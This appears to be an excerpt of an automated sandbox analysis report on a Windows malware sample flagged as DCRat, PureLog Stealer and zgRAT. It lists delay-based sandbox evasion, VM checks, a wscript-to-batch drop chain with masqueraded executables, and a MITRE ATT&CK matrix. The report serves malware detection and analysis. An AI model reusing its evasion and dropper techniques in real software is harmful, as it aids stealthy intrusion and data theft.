                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 594906Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 594797Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 594687Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 594578Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 594468Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 594359Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWindow / User API: threadDelayed 1625Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWindow / User API: threadDelayed 8140Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 5684Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7396Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599874s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599765s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599656s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599546s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599437s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599328s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599218s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599109s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -599000s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598890s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598781s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7468Thread sleep time: -10800000s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598672s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598562s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598453s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598344s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598219s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598109s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -598000s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597890s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597781s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597672s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597562s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597453s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597344s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597234s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597124s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -597015s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596906s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596797s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596687s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596578s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596467s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596359s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596250s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596140s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -596029s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -595752s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -595609s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -595481s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -595374s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -595265s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -595156s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -595033s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -594906s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -594797s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -594687s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -594578s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -594468s >= -30000sJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe TID: 7484Thread sleep time: -594359s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F8A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00F8A69B
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00F9C220
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00FAB348 FindFirstFileExA,0_2_00FAB348
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9E6A3 VirtualQuery,GetSystemInfo,0_2_00F9E6A3
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 30000Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599874Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599765Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599656Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599546Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599437Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599328Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599218Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599109Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599000Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598890Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598781Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598672Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598562Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598453Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598344Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598219Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598109Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598000Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597890Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597781Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597672Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597562Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597453Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597344Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597234Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597124Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597015Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596906Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596797Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596687Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596578Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596467Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596359Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596250Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596140Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596029Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 595752Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 595609Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 595481Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 595374Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 595265Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 595156Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 595033Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 594906Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 594797Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 594687Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 594578Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 594468Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 594359Jump to behavior
                                    Source: wscript.exe, 00000002.00000003.1317864541.0000000000C32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: HcEvQKWAu2.exe, fontReviewsavesinto.exe.0.dr, kRoaRVhtzmWNJQRz.exe.11.dr, kRoaRVhtzmWNJQRz.exe0.11.dr, Registry.exe.11.dr, kRoaRVhtzmWNJQRz.exe1.11.dr, WmiPrvSE.exe.11.drBinary or memory string: xHSQEmUK4C
                                    Source: HcEvQKWAu2.exe, 00000000.00000003.1223783891.0000000000AE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k.
                                    Source: w32tm.exe, 0000000F.00000002.1408775278.0000020493FD9000.00000004.00000020.00020000.00000000.sdmp, fontReviewsavesinto.exe, 00000011.00000002.3691986592.000000001BC7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeAPI call chain: ExitProcess graph end nodegraph_0-25132
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F9F838
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00FA7DEE mov eax, dword ptr fs:[00000030h]0_2_00FA7DEE
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00FAC030 GetProcessHeap,0_2_00FAC030
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F9F838
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9F9D5 SetUnhandledExceptionFilter,0_2_00F9F9D5
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F9FBCA
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00FA8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FA8EBD
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComponentSavesinto\ZNtisV5JM91TmuX3tDFXvJx7ah2q8kJOB5hVZXHXTCGj5p.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ComponentSavesinto\fontReviewsavesinto.exe "C:\ComponentSavesinto/fontReviewsavesinto.exe"Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\F0ZVhIKmod.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\ComponentSavesinto\fontReviewsavesinto.exe "C:\ComponentSavesinto\fontReviewsavesinto.exe" Jump to behavior
                                    Source: fontReviewsavesinto.exe, 00000011.00000002.3686700129.0000000003573000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9F654 cpuid 0_2_00F9F654
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00F9AF0F
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeQueries volume information: C:\ComponentSavesinto\fontReviewsavesinto.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeQueries volume information: C:\ComponentSavesinto\fontReviewsavesinto.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00F9DF1E
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F8B146 GetVersionExW,0_2_00F8B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000B.00000002.1337505438.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: fontReviewsavesinto.exe PID: 1648, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: fontReviewsavesinto.exe PID: 7392, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: HcEvQKWAu2.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 11.0.fontReviewsavesinto.exe.610000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.66ce702.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.6fcf702.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0000000B.00000000.1319319511.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1221219115.0000000006F81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1221537345.0000000004F2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1220726109.0000000006680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ComponentSavesinto\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComponentSavesinto\fontReviewsavesinto.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\Registry.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: HcEvQKWAu2.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 11.0.fontReviewsavesinto.exe.610000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.66ce702.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.6fcf702.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\ComponentSavesinto\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComponentSavesinto\fontReviewsavesinto.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\Registry.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000B.00000002.1337505438.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: fontReviewsavesinto.exe PID: 1648, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: fontReviewsavesinto.exe PID: 7392, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: HcEvQKWAu2.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 11.0.fontReviewsavesinto.exe.610000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.66ce702.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.6fcf702.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0000000B.00000000.1319319511.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1221219115.0000000006F81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1221537345.0000000004F2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1220726109.0000000006680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ComponentSavesinto\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComponentSavesinto\fontReviewsavesinto.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\Registry.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: HcEvQKWAu2.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 11.0.fontReviewsavesinto.exe.610000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.66ce702.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.HcEvQKWAu2.exe.6fcf702.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\ComponentSavesinto\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComponentSavesinto\fontReviewsavesinto.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\Registry.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts2
                                    Command and Scripting Interpreter                                    		11
                                    Scripting                                    		12
                                    Process Injection                                    		22
                                    Masquerading                                    		OS Credential Dumping1
                                    System Time Discovery                                    		Remote Services11
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                                    DLL Side-Loading                                    		1
                                    DLL Side-Loading                                    		1
                                    Disable or Modify Tools                                    		LSASS Memory221
                                    Security Software Discovery                                    		Remote Desktop ProtocolData from Removable Media2
                                    Non-Application Layer Protocol                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
                                    Virtualization/Sandbox Evasion                                    		Security Account Manager2
                                    Process Discovery                                    		SMB/Windows Admin SharesData from Network Shared Drive12
                                    Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                                    Process Injection                                    		NTDS131
                                    Virtualization/Sandbox Evasion                                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                                    Deobfuscate/Decode Files or Information                                    		LSA Secrets1
                                    Application Window Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                                    Obfuscated Files or Information                                    		Cached Domain Credentials2
                                    File and Directory Discovery                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
                                    Software Packing                                    		DCSync136
                                    System Information Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
